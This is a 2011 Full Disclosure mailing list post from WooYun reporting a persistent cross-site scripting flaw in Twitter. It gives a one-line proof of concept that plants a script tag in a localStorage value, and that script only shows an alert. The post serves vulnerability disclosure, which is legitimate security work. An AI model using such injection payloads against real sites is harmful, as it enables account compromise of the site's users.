Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

A persistent xss on twitter,another xss rootkit

From: WooYun <root () wooyun org>
Date: Tue, 25 Oct 2011 00:25:48 +0800
Hi

someone report a persistent xss about twitter on wooyun

http://www.wooyun.org/bugs/wooyun-2010-03075

just put on some magic code like this

localStorage.setItem(":USER:",'{"54lvwei":{"value":{"store":{"recentFollowers":{"value":"hellolvwei<script>alert(/aaaaaa/)</script>"}}}}}');

:)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: